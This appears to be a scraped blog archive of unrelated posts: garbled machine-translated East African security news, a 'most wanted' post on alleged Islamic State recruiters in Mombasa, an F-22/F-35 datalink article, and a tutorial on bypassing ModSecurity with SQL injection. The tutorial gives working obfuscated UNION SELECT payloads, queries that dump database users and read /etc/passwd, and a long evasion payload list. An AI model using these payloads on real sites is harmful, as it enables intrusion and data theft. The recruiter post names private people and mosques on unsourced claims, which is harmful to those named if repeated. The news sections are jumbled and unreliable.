Friday, December 17, 2021

RDF gets a deputy chief of military intelligence





 The President of the Republic and the Commander-in-Chief of the Rwandan Armed Forces, Paul Kagame has appointed Col François Regis Gatarayiha the Deputy Commander-in-Chief of Military Intelligence, and promoted to the rank of Lieutenant Colonel of the rank of lieutenant colonel, of which 460 were Major. It is contained in a statement issued by the Ministry of Defense on Friday, December 17, 2021. The statement states that the President of the Republic and the Commander-in-Chief of the Rwandan Armed Forces have appointed Col François Regis Gatarayiha as Deputy Commander-in-Chief. Military Intelligence Officer and Director of Technology. Col François Regis Gatarayiha, who has been the head of the National Immigration Service since 2018, had been promoted to Lieutenant Colonel in early September 2021 and was promoted to the rank of Colonel and was immediately appointed Director of Communications. and Information Security in the RDF. A statement from the Ministry of Defense also said that on Friday, President Kagame promoted 460 officers to the rank of Major and was promoted to Lieutenant Colonel. Other officers were promoted, including 472 who held the rank of Captain and were given the rank of Major. He also promoted 12,690 Private, Corporal and 2,836 Corporal.

The operation against ADF in the VIRUNGA


 Backpacks, machine guns slung over their shoulders, the infantry soldiers advance in the forest towards previously bombed sites, supposed to shelter ADF rebels hunted down in the northeast of the DRC by the Ugandan and Congolese armies.We will  fight, until the supreme sacrifice ...", launches one of the young Congolese soldiers in fatigues in front of the cameras of a small handful of journalists, including one of the 'AFP, who accompanied the army this week to northern Virunga National Park. Just before, multiple rocket launchers had fired from the Semuliki military camp, a former UN base in the area. inside the park, where 15 Tanzanian peacekeepers were killed by ADF in 2017. Famous for its mountain gorillas, who live in its southern part, the park is also used as a rear base by various armed groups that are raging. has been in eastern Democratic Republic of the Congo for a quarter of a century, including the ADF in its northern part. This is where a temporary joint HQ has been set up. Two generals, Ugandan Kayanja Muhanga, Congolese Bertin Mputela, discussed operations, while infantry from the Congolese jungle combat unit and the Ugandan mountain unit plunge into the forest. triggered on November 30 by the Ugandan air force and artillery against ADF rebel bases in eastern DRC is in its third week. No death or injury toll has been released, only a "preliminary" point. made public on December 11 reported 34 “captured terrorists”, “4 enemy bivouacs destroyed” and “31 Congolese hostages freed.” The Ugandan army said earlier this week that “three additional enemy positions” had been targeted by air and artillery strikes. the first bombardments, which had targeted the north of the province of North Kivu and the south of Ituri, Ugandan troops on the ground entered Congolese territory by the border post of Nobili. ten km, time to repair the road in poor condition and open the way for heavy machinery. - Collaborate with the army - Captain Antony Mualushayi, spokesperson for the Armed Forces of the DRC (FARDC) in the region of Beni (North Kivu), estimated at the end of last week at "more or less 48 hours" the time still necessary to make the road practicable and to allow in the Virunga a ground operation of scale. Tuesday, at the HQ installed in the park, he welcomed the progress of the intervention against the ADF (Allied Democratic Forces), rebels accused of jihadist attacks on Ugandan soil and of repeated massacres of civilians in the DRC, where they have been established since 1995. “The large-scale operations advanced wingspan very well on the ground, "he told reporters, asking the populations of the region" not to panic because of the heavy weapons. "At the same time, the Congolese coordinator of the operation, Major General Camille Bombele, arrived in Beni. He called on Wednesday residents to seize "the outstretched hand" by Congolese President Félix Tshisekedi and Ugandan President Yoweri Museveni, who "agreed to join forces to impose peace" in the region. We must "collaborate with the army and the police," he told them. North Kivu and Ituri have been under siege since the beginning of May, an exceptional measure which gave full powers to the military but which has so far failed to stop the abuses of armed groups. The inhabitants, exhausted by years of killings and insecurity, have rather welcomed the intervention

Thursday, December 16, 2021

 DRC's High Military Court delivered its judgment on Wednesday, December 15, 2021 in the appeal case lodged by 8 FARDC officers sentenced at first instance for various charges. Among the first 5 cases submitted In court, one of the defendants, a Major accused of violating the instructions, had his sentence reduced from 5 to 3 years, while Lieutenant Kibonge, prosecuted for murder, was sentenced to death and dismissed from the army. Colonel Nlandu was acquitted and released for lack of evidence. Four other officers prosecuted for embezzlement of public funds were each sentenced to 10 years of penal servitude before being permanently dismissed from the Armed Forces, noted my confidant who took part in the meeting. It is since July 22 that the 9 officers including 8 belonging to the army and another to the Congolese national police had been apprehended, suspected of having detained. rned funds intended to finance operations during the state of siege, following a stay in Bunia of the inspector general of the FARDC, Army General Gabriel Amisi Kumba, accompanied by a large delegation.

  ADF led a new incursion on the morning of this Thursday, December 16, 2021 on national route number 44 between the localities of Lukaya and Makumo, specifically in the Vingazi village of the Bangole group, Babila Babombi's chief in the territory of Mambasa and Ituri. Kasereka Sivamwenda of the local civil society who warned of this incursion ahead of a provisional assessment of 8 massacred civilians and a vehicle loaded with stolen goods. "Out of a total of 5 people on the RN44 and we are alerted that the names were directed to the west of the RN 44 to Mekwata and there were already 3 three bodies on site, which resulted in a total of 8 people. According to the same source, I would like to train from village to village, which endangers the population living in the localities of Mangonzi, Malikwanga and Mangila. Since the launch of joint military operations between the Congolese and Ugandan armies in the neighboring region of Beni in northern Kivu, the ADF has established fire brigade, established their bastions in this forest area located between the territories of Mambasa and Irumu in Ituri. Several dozen civilians have already been abducted in this region where, despite the declining state of security since May last, the army has struggled to clear the area off these terrorists.

The Al-Qaeda affiliated Al-Shabaab continue to make gains as Somali government and allies fall out. The Islamist militants reportedly captured a strategic town in the semi-autonomous central state of Galmudug.

 

The Al-Qaeda associated militant force has been able to conduct string of incursion, imminently underscoring the group’s making gains amid notable divisions between Federal government and its allies in the region.

This trend has been notable for more than a decade whereby, Al-Shabaab has been able to catapult it insurgency by capitalizing on deep political divisions in Somalia, and now the situation continues to deteriorate over long-delayed elections.

Corresponding military and local reports indicate that, the militant group captured the town of Eldheere, about 30 km south of Galmudug’s capital Dhusamareb. Al-Shabaab fighters raided and bombed a police station before taking over the strategic town on December 14. Al-Shabaab operatives blew up the town’s police station, a military base, and other administrative buildings.and also kidnapped a trader; besides were threatening a key regional road.so, on Monday, December 13, Al-Shabaab fighters briefly took over the town of Mataban before it was recaptured by troops from Galmudug state as per local sources.

The raids in Galmudug follow infighting between the Somali government and its erstwhile allies, Ahlu Sunnah Wal Jama’a (ASWJ), a Galmudug militia that was instrumental in the fight against Al-Shabaab. ASWJ says the government has accepted too many hardline clerics into its fold.

Intelligence analysts have severally warned of toxic political divisions in the war-torn Somalia and now fear these political and geopolitical clashes will continue to derail the fight against Al-Shabaab.


Mohamed Abubakar aka Minshawary the chief Recruiter of ADF/islamic state central Africa is among the most wanted missing youths.

 

LET THIS BE AN ALERT TO ALL SECURITY AGENCIES  IN EAST AFRICA AND PEOPLE WORKING AT BORDER POINTS

 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::

In an effort to sketch a face of a jihadist, one notable is the fact that the mark of a terrorist is behavior, not ideology. One such case is Mohamed Abubakar aka Minshawary (a pseudonym on various HDCN), a 22 year old native male who is wanted in the Republic of Kenya over his links to terrorism, particularly for his close association with Salim Mohamed Rashid, a Mid-Level commander of the Islamic States Wilayaat Congo (IS-Central Africa Province) and his local associates including Abdulhakim Sagaar, Hashbel Karama aka Abu Ghuraba a radicalizer at Masjid Jamia, and Jamal Din a recruiter. Abubakar is believed to be radical and extreme since his mid-teenage, but his penchant for Jihad got insatiable when his childhood buddy Salim Mohamed Rashid went to DR Congo and in recent past appeared in an ISCAP video proclaiming his forays doingHijra.

Mohamed Abubakar is also a senior member of a youth network that exploits Masjid Musa Mosque located in Manjengo area of Mombasa, a coastal tourist city in Kenya, as a radicalization and recruitment center. Intelligence tracked and traced the network to Goma and Butembo in DR-Congo. A number of Kenyan youths from the Masjid Musa Mosque were last seen in the 2 cities after getting temporary unofficial-jobs as truckers. Abubakar recruited the youths and planned their logistics to DR-Congo by getting them temporary jobs as ‘turn-boys for trucks’ destined for Democratic Republic of Congo. Freight Forwarding companies owned by some Yemeni businessmen are often exploited during these terrorist operations. At Goma or Bukavu, they spend a night or two at specific Mosques where they are picked by ISCAP logisticians and moved to terrorists training camps in Beni deep in Kivu prefecture.

While authorities in Kenya are looking for the terror suspect over alleged links to the Al-Qaeda branch in Somalia, Harakat Shabaab al-Mujahideen, Mohamed Abubakar is a logistician for Islamic States Central Africa Province (ISCAP) terrorist organization, the ISIS branch in DR-Congo. He is a terrorist cell ran and controlled by his old time friend and childhood buddy, Salim Mohamed Rashid, a thief turned jihadist who mastered how to assemble IED’S while still living in Mombasa. Abubakar claims he is a a Swahili poet and aNasheedartist based on Swahili, Arabic and English languages, a perfect cover for symbol/coded communication.

The release of AbulHakim Sagaar may have had a significant impact of Abubakar’s socio-psychologically, prompting him to perhaps think about achievingshahada. Fearing that his network has been compromised by either security intelligence services or rival terrorist organization Al Shabaab, Mohamed Abubakar is potentially dangerous and as intelligence socio-psychology experts warn; will go into sleeper cell mode and subsequently morph into either a lone-wolf or make Hijra outside Kenya (In Somalia or DR-Congo).

According to intelligence experts, terrorism is not owned by a particular organization or ideology, rather, it’s a tactic deployed by anyone looking to use violence for some political or religious aim. “Abubakar created an audio visual production in form of anasheed, in which he aspires to die a hero after inflicting heavy casualties on enemies of his ideology, an indicator he was preparing to conduct an attack at home or elsewhere”. He is terrorist, and having not only government officials but everyday people understand that is key to catching additional would-be attackers before it’s too late.

TERRORISM! FROM THE MOSQUES AT EASTAFRICA COAST TO THE JUNGLES OF EASTERN DRC.

 


In Mombasa, Mlango wa Papa Mosque is gradually but covertly being converted to an Islamic States ideology indoctrination center and a source of jihadists, an indicator the Al-Qaeda branch in Somalia, Harakat Al-Shabaab al Mujahideen has been badly outbid and routed out of its traditional East African coastal networks. The Mosque, a flashpoint during the Rogo and Makaburi heydays, is giving away youthful members to the Islamic States terrorist organization in the Democratic Republic of Congo (ISCAP DR-Congo).

The eyes of regional Counter Terrorism Operators are focused on Coastal Kenya following a string of suspect terror events traced back to Islamic States terrorist group sleeper cells. In Mid-August, 2021, Abdul Hakim Sagar, a Mombasa based Printer and Mosque official of Mlango wa Papa Mosque was picked by counter terrorism operators. Intelligence warns that, him, alongside Suleiman Mohamed who joined the Islamic States Congo Province group early 2020, are actively recruiting, facilitatinghijra, and financing activities of the Islamic States terrorist group at the Mosque located in Old Town area. Sagar is a relative of Haniya Sagar Rogo, wife to the late Aboud Rogo, a notorious Al-Shabaab al Mujahideen recruiter, financier, and ideologue. Abdul-Hakim Sagar was one of Rogo’s best students and had a ‘Father-Son’ relationship with the rogue cleric. Abdul is believed to be a stalwart of the Rogo network, He has ensured patrons remained faithful to the cause and often swear fealty to the late ideologue.

According to intelligence analysts at S.I, there is a great deal of variety in the way Muslims youth at Old Town and neighboring places are being radicalized and recruited for ISCAP. The recruiters have consistently used the mosques, gyms and local Madrassa and Islamic associations as places to spot potential recruits. The recruits are then taken aside, away from the view of the community, and radicalized one-on-one or in small groups then once indoctrinated are facilitated to travel to Congo and Mozambique.

Abdul Sagar has used his printing press to print radicalization material for the group and has kept close contact with Suleiman Mohamed via some specific high dimension communication networks (HDCN) including Facebook Messenger, Signal, Telegram, and 2 other popular encrypted chat platforms, some of which are often recommended by Jihadist Cyber teams. Abdul has also kept covert communication with Nasra Mohamed, an Islamic States sympathizer from Mombasa. Nasra is the sister in-law to Mombasa politician, Mohamed Sagar another relative of Abdul Hakim Sagar. Nasra has been to Syria where she served the Daesh. Intelligence collected by S.I confirms Nasra’s Hijra was facilitated by Abdul Hakim Sagar. Nasra was intercepted by Counter Terrorism officials multiple times in her attempts to travel to Turkey, Oman, Syria, Egypt, and Libya. Dubai immigration officials denied her a Visa after she appeared on the INTERPOL red-list and intelligence reports.

S.I and security services have repeatedly warned about domestic terrorists and grassroots jihadists.  The Kenyan homeland will face a persistent and evolving terrorist threat over time. The main threat comes from al-Shabaab Mijahideen, driven by their undiminished intent to attack Kenya and a continued effort by these terrorist groups to adapt and improve their capability, besides the new ISIS outfit in East and Central Africa who original birthplace was Coastal Kenya (Ref: Al Muhajiroun). The threat of ISCAP attacks in Kenya is high, and such the Republic of Kenya is currently is in a heightened threat environment.

Despite recent counter terrorism successes, the threat of attacks will remain high over time. Terrorist attacks do not occur in a vacuum — rather, they are the result of a methodical process, which makes perpetrators vulnerable to detection each step of the way and this is how Abdul Hakim Sagar and his associates have been outed. Because of this, it is important to focus on indications that attacks are being planned regardless of the actor’s race, ethnicity or ideological bent in an effort to prevent future atrocities. Abdul Hakim Sagar accomplices have caused their families great pain and incurred them significant financial loss. Hakim Saggar and his relatives were involved in violent skirmishes at the Mlango wa Papa Mosque as they attempted to eject the Sufi leadership in favor of violent Wahhabi ideologues. The Saggar’s want the Islamic States to support their jihad project in Mombasa, this would mean massive financial support which would eventually give them sociopolitical and religious power in the Coastal tourist city and beyond.

SOME KEY FIGURES OF ISLAMIC STATE TERRORISTS OUR INTELLIGENCE AND LOCAL COMMUNITIES MUST BE AWARE OF! MAKE SURE THEY DO NOT HAVE THEIR NETWORKS INSIDE OUR TOWNS,VILLAGES AND MOSQUES.

 

1.Abdul

Hakim Sagar is a Mombasa based Printer and

Mosque official of Mlango wa Papa Mosque.

Intelligence warns that, him, alongside

Suleiman Mohamed who joined the Islamic

States Congo Province group early 2020, are

actively recruiting, facilitating hijra, and

financing activities of the Islamic States

terrorist group at the Mosque located in Old

Town area. Sagar is a relative of Haniya

Sagar Rogo, wife to the late Aboud Rogo, a

notorious Al-Shabaab al Mujahideen

recruiter, financier, and ideologue. Abdul-

Hakim Sagar was one of Rogo’s best

students and had a ‘Father-Son’ relationship

with the rogue cleric. Abdul is believed to be

a stalwart of the Rogo network, He has

ensured patrons remained faithful to the

cause and often swear fealty to the late

ideologue.

According to intelligence analysts ,

there is a great deal of variety in the way

Muslims youth at Old Town and

neighboring places are being radicalized

and recruited for ISCAP. The recruiters

have consistently used the mosques,

gyms and local Madrassa and Islamic

associations as places to spot potential

recruits. The recruits are then taken

aside, away from the view of the

community, and radicalized one-on-one

or in small groups then once

indoctrinated are facilitated to travel to

Congo and Mozambique.

Abdul Sagar has used his printing press to

print radicalization material for the group

and has kept close contact with Suleiman

Mohamed via some specific high dimension

communication networks (HDCN) including

Facebook Messenger, Signal, Telegram, and

2 other popular encrypted chat platforms,

some of which are often recommended by

Jihadist Cyber teams. Abdul has also kept

covert communication with Nasra Mohamed,

an Islamic States sympathizer from

Mombasa.

2.Nasra Mohamed,

an Islamic States sympathizer from

Mombasa. Nasra is the sister in-law to

Mombasa politician, Mohamed Sagar

another relative of Abdul Hakim Sagar. Nasra

has been to Syria where she served the

Daesh. Intelligence Information confirms

Nasra’s Hijra was facilitated by Abdul Hakim

Sagar. Nasra was intercepted by Counter

Terrorism officials multiple times in her

attempts to travel to Turkey, Oman, Syria,

Egypt, and Libya. Dubai immigration officials

denied her a Visa after she appeared on the

INTERPOL red-list and intelligence reports.

3.Muhammad Abubakar Said aka Minshawary (a pseudonym on various (social media platforms), a 22 year old native of Kenya precisely from kibokoni is wanted in the Republic of Kenya over his links to terrorism. Abubakar is believed to be radical and extreme since his mid-teenage, but his penchant for Jihad got insatiable when his childhood buddy Salim Mohamed Rashid went to DR Congo and in recent past appeared in an ISCAP video proclaiming his forays doing hijra.

Mohamed Abubakar went to Liwatoni Muslim School and is currently a student at Ummah University pursuing a Diploma in Business Management is also a senior member of a youth network that exploits Masjid Musa Mosque located in Manjengo area of Mombasa, a coastal tourist city in Kenya, as a radicalization and recruitment center with tracked and traced network to Goma and Butembo in DR-Congo. A number of Kenyan youths from the Masjid Musa Mosque were last seen in the 2 cities after getting temporary unofficial-jobs as truckers. Abubakar recruited the youths and planned their logistics to DR-Congo by getting them temporary jobs as ‘turn-boys for trucks’ destined for Democratic Republic of Congo. Freight Forwarding companies owned by some Yemeni businessmen are often exploited during these terrorist operations. At Goma or Bukavu, they spend a night or two at specific Mosques where they are picked by ISCAP logistician’s and moved to terrorists training camps in Beni deep in Kivu prefecture.

While authorities in Kenya are looking for the terror suspect over alleged links to the Al-Qaeda branch in Somalia, Harakat Shabaab al-Mujahideen, Mohamed Abubakar is a logistician for Islamic States Central Africa Province (ISCAP) terrorist organization, the ISIS branch in DR-Congo. He is a member of a terrorist cell ran and controlled by his old time friend and childhood buddy, Salim Mohamed Rashid. Abubakar claims he is a a Swahili poet and aNasheedartist based on Swahili, Arabic and English languages, a perfect cover for symbol/coded communication.

4.Salim Mohamed Rashid aka chotara, he is a thief who turned into a jihadist and running network of a terror cells, a Mid-Level commander of the Islamic States Wilayaat Congo (IS-Central Africa Province).Rashid mastered the art of assembling IEDs when he was still living in mombasa.

5.Others are Hashbel Karama aka Abu Ghuraba a radicalizer at Masjid Jamia and Jamal Din a recruiter.


Monday, December 21, 2020

Will US F22 and F35 be able to stealthy communicate during sky operations

 


The latest test of the gatewayONE communication system, developed to allow F22 and F35 to communicate with each other and transfer mission data without being spotted, failed, but thet Pentagon still believes it is on  the right track two fighters work together.

According to US Air Force acquisition executive Will Roper, the trial on 9 December at the Yuma Proving Ground in Arizona, managed to fulfill half of the tasks set before it. However, the gatewayONE module mounted on an unmanned Kratos XQ-58A Valkyrie drone flying alongside the two jets "lost connectivity" soon after take-off. The preliminary version is that some of the module's hardware was displaced or came loose during lift-off.

"We think we had a connector that came loose during it because the gateway itself was fine when the Valkyrie landed. So [it's] a thing we've learned from and we'll fix next time […] Next time we get out, flying in the next on-ramp, we'll probably check those soldering points more than one time", Will Roper said.

The Air Force believes the gatewayONE will be able to give the necessary connectivity between the newest jet and its predecessor, but admits the proof of concept might be months away due to the setbacks in the last trial. Nonetheless, the 9 December test gave some promising results – namely, the on the ground second gatewayONE module managed to transfer some of the data between F-22 and F-35 into the skies, such as targeting cues. Although, it never managed to transfer all the information it was supposed to.

The Pentagon initially considered installing a similar module, called the Advanced Battle Management System, directly on the jets to enable direct connectivity between the fourth and the fifth-generation fighters, and even ran the first test in 2019. According to defence officials, the two jets managed to exchange data using radio systems built by the respective contractors who modelled the original jets, Lockheed Martin and Northrop Grumman.

However, the Pentagon has since seemingly abandoned the idea in favour of an autonomous drone-mounted system. While normally with the introduction of new communication standards or data links the older machines are retrofitted with compatible equipment, such an operation could prove both costly and time-consuming, when it comes to an extensive fleet of nearly 190 American F-22 fighters. Air Force Chief Architect Preston Dunlap suggested during a conference with the press on 16 December, that using low-cost and expendable drones to fill in the communications gap between the two generations of jets might be a better approach.

Sunday, December 20, 2020

How to bypass mod_security (WAF)

 




What is Mod_security?

ModSecurity is an embeddable web application firewall under GNU license that runs as a module of the Apache web server, provides protection against various attacks on web applications and allows monitoring HTTP traffic, as well as performing analysis in real time without the need to make changes to the infrastructure existing. modSecurity filters attacks by XSS, SQL Injection, abnormal behavior in protocols, robots, Trojans, LFI … also incorporating specific rules for some of the most popular content managers such as Joomla or Wordpress.

Now … we go through steps, the first thing we have to do is look for parameters on the website and test them, as you already know, something very useful and fast is to use a simple ‘ (single quote) after the value of a parameter to generate a database error and find out whether or not the page is vulnerable to sql injection.

I found a parameter called “productid” and a single quote was added to the end of its value. As a result, the page showed the error:

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’

Image for postImage for post

This means that the page is vulnerable to sql injections.

At this point we proceed to perform the injection, with which we will use a simple method as the first method:

-1+union+select+1+ — +

As a result of the above we have the following:

Image for postImage for post

The site is protected by Mod_security.

Next is to use different ways of injecting and encoding methods for sql injections.

I personally feel more comfortable with the injection with the following syntax:

-1+union(select+1)+ — +

Then I tried mixing upper and lower case:

Image for postImage for post

but with the same result ..

I also tried using url encoding

-1+%55nIoN(%53EleCt+1)+ — +

Image for postImage for post

Double and triple URL encoding

% 2555nIoN% 28% 2553EleCt% 2B1% 29

% 252555nIoN% 2528% 252553EleCt% 252B1% 2529

But it didn’t work out.

Finally I decided to stick with a single URL encoding vilifying this payload:

-1+%55nIoN(%53EleCt+1)+ — +

The next step was to mix comment coding:

-1+/*!12345% 55nIoN*//**/(/*!12345%53EleCt*//**/1)+ — +

Image for postImage for post

And ready!! with this we bypass the WAF filters!

shows us the following legend:

“The used SELECT statements have a different number of columns”

With this we will find out the number of columns on the page:

In this case there are 24 columns, of which number 5 is vulnerable:

-1+/*!12345UnIoN*//**/(/*!12345SEleCt*//**/ 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24)+ — +

Now the next thing is to get information … For this I will use one of my resources where the different ways to extract basic information from a database come, the complete information is in the following link:

https://github.com/Y000o/sql_injection_basic/blob/master/sql_injection_basic_en.md

|   Version   |  SELECT @@version o SELECT version()  | gives us the version of the database  |


| Current User | SELECT user() o SELECT system_user() | gives us the user we have |


| List Users | SELECT user FROM mysql.user | shows us all users |


| Database  | SELECT database() | shows us the database we are in |


| Lista de bases de datos | SELECT schema_name FROM information_schema.schemata | shows us the databases  |


| List tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ | shows us the tables of the chosen database |


| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ | shows us the columns of the chosen table |


| Local File Access |  UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)  | if possible, let us read system files |


| DB location | SELECT @@datadir | It shows us the address where the database is installed |

Finally I will leave a list of payloads with which you can help:

Union Select

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/

+ #?uNiOn + #?sEleCt

+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt

/*!%55NiOn*/ /*!%53eLEct*/

/*!u%6eion*/ /*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union (/*!/**/ SeleCT */ 1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/ /*!SelECt*/

+union+distinct+select+

+union+distinctROW+select+

uNiOn aLl sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union (select 1111,2222,3333)

uNioN (/*!/**/ SeleCT */ 11)

union (select 1111,2222,3333)

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/

%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

/union\sselect/g

/union\s+select/i

/*!UnIoN*/SeLeCT

+UnIoN/*&a=*/SeLeCT/*&a=*/

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+’UnI”On’+'SeL”ECT’

+uni on+sel ect+

+/*!UnIoN*/+/*!SeLeCt*/+

/*!u%6eion*/ /*!se%6cect*/

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/ /^.*select.*$/

/*union*/union/*select*/select+

/*uni X on*/union/*sel X ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/

un?<ion sel="">+un/**/ion+se/**/lect+

+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

/*!UnIoN*/SeLecT+

Concat

CoNcAt()

concat() 

CON%08CAT()

CoNcAt()

%0AcOnCat()

/**//*!12345cOnCat*/

/*!50000cOnCat*/(/*!*/)

unhex(hex(concat(table_name)))

unhex(hex(/*!12345concat*/(table_name)))

unhex(hex(/*!50000concat*/(table_name)))

group_concat

/*!group_concat*/()

gRoUp_cOnCAt()

group_concat(/*!*/)

group_concat(/*!12345table_name*/)

group_concat(/*!50000table_name*/)

/*!group_concat*/(/*!12345table_name*/)

/*!group_concat*/(/*!50000table_name*/)

/*!12345group_concat*/(/*!12345table_name*/)

/*!50000group_concat*/(/*!50000table_name*/)

/*!GrOuP_ConCaT*/()

/*!12345GroUP_ConCat*/()

/*!50000gRouP_cOnCaT*/()

/*!50000Gr%6fuP_c%6fnCAT*/()

unhex(hex(group_concat(table_name)))

unhex(hex(/*!group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(table_name)))

unhex(hex(/*!12345group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))

unhex(hex(/*!50000group_concat*/(table_name)))

unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))

convert(group_concat(table_name)+using+ascii)

convert(group_concat(/*!table_name*/)+using+ascii)

convert(group_concat(/*!12345table_name*/)+using+ascii)

convert(group_concat(/*!50000table_name*/)+using+ascii)

CONVERT(group_concat(table_name)+USING+latin1)

Information_schema.tables

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


The core ,dangerous and malicious strategies of ISIS our Moslem communities in Uganda should be careful of.

  From its emergence to the present day, ISIS has heavily invested in and operated through three core strategies, which elucidate the founda...